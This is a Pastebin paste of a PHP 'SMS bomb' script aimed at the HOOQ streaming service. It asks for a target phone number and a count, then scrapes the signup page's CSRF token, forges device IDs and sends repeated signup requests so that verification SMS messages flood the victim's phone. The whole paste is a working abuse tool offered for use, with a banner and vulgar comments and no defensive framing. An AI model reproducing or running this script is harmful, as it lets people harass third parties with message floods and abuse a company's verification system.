Advertisement
kaiz1337

BOM SMS HOOQ

Feb 11th, 2018
271
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.26 KB | None | 0 0
  1. <?php
  2.  
  3.  
  4.  
  5. // BOM SMS BY W ( Iz )
  6. // KaizArz
  7. // 2K18 MEN
  8. // 1 LAGI
  9. // LO KENTOTTTTTTT
  10. // JANCOKKKKKK
  11.  
  12.  
  13.  
  14.  
  15.  
  16.  
  17.  
  18. error_reporting(0);
  19. Class Bom {
  20. public $no;
  21. public function sendC($url, $page, $params) {
  22. $ch=curl_init();
  23. curl_setopt ($ch, CURLOPT_URL, $url.$page);
  24. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  25. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  26. if(!empty($params)) {
  27. curl_setopt ($ch, CURLOPT_POSTFIELDS, $params);
  28. curl_setopt ($ch, CURLOPT_POST, 1);
  29. }
  30. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  31. curl_setopt ($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  32. curl_setopt ($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  33. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  34. $headers=array();
  35. $headers[]='Content-Type: application/x-www-form-urlencoded; charset=utf-8';
  36. $headers[]='X-Requested-With: XMLHttpRequest';
  37. curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
  38. curl_setopt ($ch, CURLOPT_HEADER, 1);
  39. $result=curl_exec ($ch);
  40. curl_close($ch);
  41. return $result;
  42. }
  43. private function getStr($start, $end, $string) {
  44. if(!empty($string)) {
  45. $setring = explode($start,$string);
  46. $setring = explode($end,$setring[1]);
  47. return $setring[0];
  48. }
  49. }
  50. public function angka($length = 4) {
  51. $characters='0123456789';
  52. $charactersLength=strlen($characters);
  53. $randomString='';
  54. for($i = 0; $i < $length; $i++) {
  55. $randomString .= $characters[rand(0, $charactersLength - 1)];
  56. }
  57. return $randomString;
  58. }
  59. public function Verif() {
  60. $url="https://www.hooq.tv/signup";
  61. $no=$this->no;
  62. $getkey=$this->sendC("https://www.hooq.tv/id/signup", null, null);
  63. $key=$this->getStr('name="_csrf" value="','" />',$getkey);
  64. $data="_csrf={$key}&device_id=56ad6be9-cd02-{$this->angka()}-{$this->angka()}-d4f2435ef6e8&country_code=%2B62&mobile={$no}";
  65. $send=$this->sendC($url, null, $data);
  66. if(preg_match('/SMS Kode Verifikasi Kamu sudah terkirim ke/', $send)) {
  67. echo "\n\e Sukses Terkirim !";
  68. flush();
  69. ob_flush();
  70. sleep(1);
  71. }else {
  72. echo "\n\e Gagal Sad x!";
  73. flush();
  74. ob_flush();
  75. sleep(1);
  76. }
  77. }
  78. }
  79. echo "
  80.  
  81.  
  82.  
  83.  
  84. _ _ _ _ _
  85. / /\ / /\ /\ \ /\ \ /\ \
  86. / / / / / / / \ \ / \ \ / \ \
  87. / /_/ / / / / /\ \ \ / /\ \ \ / /\ \ \
  88. / /\ \__/ / / / / /\ \ \ / / /\ \ \ / / /\ \ \
  89. / /\ \___\/ / / / / \ \_\ / / / \ \_\ / / / \ \_\
  90. / / /\/___/ / / / / / / / / / / / / / / / / _ / / /
  91. / / / / / / / / / / / / / / / / / / / / / /\ \/ /
  92. / / / / / / / / /___/ / / / / /___/ / / / / /__\ \ \/
  93. / / / / / / / / /____\/ / / / /____\/ / / / /____\ \ \
  94. \/_/ \/_/ \/_________/ \/_________/ \/________\_\/
  95. - 2K18
  96.  
  97.  
  98.  
  99.  
  100. ";
  101. echo "Nomer Target : ";
  102. $target=trim(fgets(STDIN, 1024));
  103. echo "Jumlah SMS : ";
  104. $jumlah=trim(fgets(STDIN, 1024));
  105. $init=new Bom();
  106. $init->no="$target";
  107. $loop="$jumlah";
  108. for($i=0; $i < $loop; $i++) {
  109. $init->Verif($init->no);
  110. }
  111. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement